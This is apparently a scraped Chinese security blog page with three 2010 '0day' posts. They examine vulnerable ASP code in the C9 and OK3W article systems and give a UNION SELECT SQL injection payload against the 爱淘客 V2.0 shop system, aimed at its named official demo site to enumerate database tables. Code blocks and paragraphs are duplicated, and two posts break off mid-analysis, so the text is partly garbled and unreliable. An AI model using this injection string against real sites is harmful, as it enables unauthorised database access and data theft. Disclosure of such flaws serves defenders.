C9静态文章发布系统漏洞 0day
作者:admin 日期:2010-05-16
看到一个叫C9静态文章发布系统的程序 只不过没仔细看过。今天下载回来一份看了下 发现了问题 在投票那里 是一个flash投票系统,flash我不懂 于是抓了个包看了下 发现是通过add.asp提交投票 xml.asp 提供rss输出 当读到这里的时候 发现了问题
代码如下: <% thisid=funstr(Trim(Request.QueryString("voteid"))) if thisid="" then set rs=conn.execute("select top 1 * from plug_vote where oorc<>false order by id desc") else set rs=conn.execute("select * from plug_vote where id="&thisid) end if if rs.eof then response.Write("连接数据发生错误"):response.End() conn.execute "update plug_vote set votevi=votevi+1 where id="&rs("id") for i=1 to 5 if isnull(rs("cs_"&i)) then exit for next nowid=rs("id") ...... %>
这里 我们看下是如何接收变量传递进来的值的 thisid=funstr(Trim(Request.QueryString("voteid"))) trim 过滤两边空格 然后是funstr这个函数 在包含文件里有个 fun/funlogic.asp 函数应该在这里 打开这个文件
代码如下: <% thisid=funstr(Trim(Request.QueryString("voteid"))) if thisid="" then set rs=conn.execute("select top 1 * from plug_vote where oorc<>false order by id desc") else set rs=conn.execute("select * from plug_vote where id="&thisid) end if if rs.eof then response.Write("连接数据发生错误"):response.End() conn.execute "update plug_vote set votevi=votevi+1 where id="&rs("id") for i=1 to 5 if isnull(rs("cs_"&i)) then exit for next nowid=rs("id") ...... %>
这里 我们看下是如何接收变量传递进来的值的 thisid=funstr(Trim(Request.QueryString("voteid"))) trim 过滤两边空格 然后是funstr这个函数 在包含文件里有个 fun/funlogic.asp 函数应该在这里 打开这个文件
OK3W文章管理系统漏洞0day
作者:admin 日期:2010-05-16
OK3W是一套文章管理系统,整套系统的程序结构是以自定义类来实现的,很有创意o(∩_∩)o...安全性还是比较好的,目前免费版4.7存在这个漏洞,官网也存在,不过不知道补了没,上次路过被发现了后台验证过程
Public Function AdminIsLogin() If Trim(AdminName) = "" Then AdminIsLogin = 0'没有登陆 Else If AdminLogin(AdminName,AdminPwd,"IsCheck")<>-1 Then AdminIsLogin = 0'Cookies错误 Else AdminIsLogin = -1'已经登陆 End If End If End Function Public Function AdminLogin(sAdminName,sAdminPwd,sType) AdminName = sAdminName Sql = "select * from Ok3w_Admin where AdminName=? and AdminPwd=?" Set AdminCmd = Server.CreateObject("Adodb.Command") AdminCmd.ActiveConnection = Conn AdminCmd.CommandType = 1 AdminCmd.CommandText = Sql AdminCmd.Parameters.Append(AdminCmd.CreateParameter("@AdminName",200,1,50,sAdminName)) AdminCmd.Parameters.Append(AdminCmd.CreateParameter("@AdminPwd",200,1,50,sAdminPwd)) Set AdminRs = Server.CreateObject("Adodb.RecordSet") Set AdminRs = AdminCmd.Execute response.write sAdminName&" "&sAdminPwd&"" response.write AdminCmd.CommandText Set AdminCmd = Nothing If AdminRs.Eof And AdminRs.Bof Then AdminLogin = 1'用户名或密码错误 Else If AdminRs("AdminLock") Then AdminLogin = 2'用户被锁定 Else Response.Cookies("Ok3w")("AdminId") = AdminRs("AdminId") Response.Cookies("Ok3w")("AdminName") = AdminRs("AdminName") Response.Cookies("Ok3w")("AdminPwd") = AdminRs("AdminPwd") Response.Cookies("Ok3w")("GroupId") = AdminRs("GroupId") If sType="IsLogin" Then Call AdminActionLog("成功登陆") AdminLogin = -1'成功登陆 End If End If AdminRs.Close Set AdminRs = Nothing response.write adminlogin End Function
本来我看到这里以为可以好不费力的拿下,基础过过关,这里登陆验证虽然是采用cookies验证,但是sql语句是用预编译的方式进行查询的,所以单引号这里是没用的,不能用万能密码。(感谢ninty大牛指点)
Public Function AdminIsLogin() If Trim(AdminName) = "" Then AdminIsLogin = 0'没有登陆 Else If AdminLogin(AdminName,AdminPwd,"IsCheck")<>-1 Then AdminIsLogin = 0'Cookies错误 Else AdminIsLogin = -1'已经登陆 End If End If End Function Public Function AdminLogin(sAdminName,sAdminPwd,sType) AdminName = sAdminName Sql = "select * from Ok3w_Admin where AdminName=? and AdminPwd=?" Set AdminCmd = Server.CreateObject("Adodb.Command") AdminCmd.ActiveConnection = Conn AdminCmd.CommandType = 1 AdminCmd.CommandText = Sql AdminCmd.Parameters.Append(AdminCmd.CreateParameter("@AdminName",200,1,50,sAdminName)) AdminCmd.Parameters.Append(AdminCmd.CreateParameter("@AdminPwd",200,1,50,sAdminPwd)) Set AdminRs = Server.CreateObject("Adodb.RecordSet") Set AdminRs = AdminCmd.Execute response.write sAdminName&" "&sAdminPwd&"" response.write AdminCmd.CommandText Set AdminCmd = Nothing If AdminRs.Eof And AdminRs.Bof Then AdminLogin = 1'用户名或密码错误 Else If AdminRs("AdminLock") Then AdminLogin = 2'用户被锁定 Else Response.Cookies("Ok3w")("AdminId") = AdminRs("AdminId") Response.Cookies("Ok3w")("AdminName") = AdminRs("AdminName") Response.Cookies("Ok3w")("AdminPwd") = AdminRs("AdminPwd") Response.Cookies("Ok3w")("GroupId") = AdminRs("GroupId") If sType="IsLogin" Then Call AdminActionLog("成功登陆") AdminLogin = -1'成功登陆 End If End If AdminRs.Close Set AdminRs = Nothing response.write adminlogin End Function
本来我看到这里以为可以好不费力的拿下,基础过过关,这里登陆验证虽然是采用cookies验证,但是sql语句是用预编译的方式进行查询的,所以单引号这里是没用的,不能用万能密码。(感谢ninty大牛指点)
爱淘客淘宝客系统 V2.0 0day
作者:admin 日期:2010-05-16
以官方演示版(http://demo.2taoke.com)为例:此脚本程序存在一个注入漏洞,考虑到官方,具体哪个点暂时不说。 构造下面注入语句:
?id=-999.9%20UNION%20ALL%20Select%20(Select%20concat(0x7e,0x27,count(table_name),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x3274616F6B655F64656D6F),2,3--
?id=-999.9%20UNION%20ALL%20Select%20(Select%20concat(0x7e,0x27,count(table_name),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x3274616F6B655F64656D6F),2,3--
